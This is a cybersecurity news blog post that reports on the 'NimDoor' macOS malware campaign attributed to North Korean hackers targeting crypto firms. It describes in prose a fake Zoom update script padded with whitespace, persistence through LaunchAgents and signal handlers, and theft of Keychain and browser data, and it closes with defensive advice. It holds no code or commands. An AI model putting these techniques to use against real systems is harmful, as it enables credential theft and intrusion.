North Korean Hackers Deploy macOS Malware to Target Crypto Firms

Alan V Gutnov
Alan V Gutnov

Director of Strategy

 
July 16, 2025 2 min read

North Korean Malware Campaign Targeting Crypto Firms

North Korean hackers are executing a sophisticated campaign leveraging malware designed to infiltrate Web3 and cryptocurrency organizations. This campaign utilizes a variety of techniques, including social engineering, deceptive AppleScripts, and binaries compiled in the niche programming language Nim. The operation is referred to as "NimDoor" by researchers at Sentinel Labs.

Hacker in a dark hoody sitting in front of a notebook with digital north korean flag and binary streams background cybersecurity concept
Image courtesy of CSO Online

Attack Vector and Initial Compromise

The initial phase of the attack often begins with social engineering tactics. Victims receive messages on Telegram from contacts they believe to be trustworthy, requesting to schedule meetings via Calendly. Following this, they receive phishing emails containing fake Zoom meeting invitations and instructions to run a bogus "Zoom SDK update" script. The script, named zoom_sdk_support.scpt, is padded with 10,000 lines of white space to obfuscate its malicious intent while it executes a secondary payload from a remote server.

Researchers at Huntress have documented these attacks, noting that the malware is capable of maintaining persistence on compromised systems through clever techniques involving macOS LaunchAgents. This allows the malware to reinstate itself even after termination or a system reboot.

Multi-Stage Infection Process

Once the initial script is executed, it downloads two Mach-O binaries. The first, written in C++, writes an encrypted payload to disk, while the second, compiled from Nim source code, is responsible for maintaining access. This malware employs process injection techniques, a rarity in macOS malware, and communicates over TLS-encrypted WebSockets (wss) to exfiltrate sensitive information.

Authy hack | Low-key photo of MacBook keyboard
Image courtesy of 9to5Mac

Data Exfiltration Techniques

The malware utilizes Bash scripts to scrape and exfiltrate sensitive user data, including Keychain credentials and browser information from popular browsers like Chrome, Firefox, and Brave. The malware's persistence is cleverly disguised using names that resemble legitimate system files, making detection difficult.

In addition to data scraping, the malware employs a unique persistence mechanism that leverages signal handlers for SIGINT and SIGTERM, ensuring it remains active even when attempts are made to terminate its processes. This technique represents an evolution in North Korean cyber operations, illustrating their shift towards utilizing less common programming languages, such as Nim, for malicious purposes.

Conclusion

The NimDoor malware campaign exemplifies the evolving threat landscape posed by North Korean APT groups. Users are advised to remain vigilant and avoid executing scripts or software updates from unexpected sources. Keeping macOS systems updated with the latest security patches and utilizing reputable endpoint security tools can help mitigate the risks posed by these sophisticated attacks.

For more detailed technical insights, refer to the full reports from Sentinel Labs and Huntress.

Alan V Gutnov
Alan V Gutnov

Director of Strategy

 

MBA-credentialed cybersecurity expert specializing in Post-Quantum Cybersecurity solutions with proven capability to reduce attack surfaces by 90%.

Related Articles

Ransomware Attacks Target Russian Vodka and Healthcare Sectors

The Novabev Group, parent company of the Beluga vodka brand, experienced a ransomware attack on July 14, 2025, causing significant disruptions. The attack affected WineLab, the company's liquor store chain, leading to a three-day closure of over 2,000 locations in Russia. The company reported that the attack crippled its IT infrastructure, particularly point-of-sale systems and online services. Novabev Group stated, "The company maintains a principled position of rejecting any interaction with cybercriminals and refuses to fulfill their demands."

By Alan V Gutnov July 19, 2025 3 min read
Read full article

Retail Sector Faces Surge in Ransomware Attacks: A 2025 Analysis

Publicly disclosed ransomware attacks on the retail sector globally surged by 58% in Q2 2025 compared to Q1, with UK-based firms being particularly targeted, according to a report by BlackFog. This spike in attacks follows high-profile breaches affecting retailers like Marks & Spencer (M&S), The Co-op, and Harrods, attributed to the threat actor known as Scattered Spider.

By Alan V Gutnov July 19, 2025 2 min read
Read full article

AI-Driven Lcryx Ransomware Emerges in Cryptomining Botnet

A cryptomining botnet active since 2019 has incorporated a likely AI-generated ransomware known as Lcryx into its operations. Recent analysis by the FortiCNAPP team at FortiGuard Labs identified the first documented incident linking H2miner and Lcryx ransomware. This investigation focused on a cluster of virtual private servers (VPS) utilized for mining Monero.

By Edward Zhou July 19, 2025 3 min read
Read full article

Preventing ClickFix Attacks: Safeguarding Against Human Error

ClickFix is an emerging social engineering technique utilized by threat actors to exploit human error. This technique involves misleading users into executing malicious commands under the guise of providing "quick fixes" for common computer issues. Threat actors use familiar platforms and deceptive prompts to encourage victims to paste and run harmful scripts.

By Alan V Gutnov July 19, 2025 3 min read
Read full article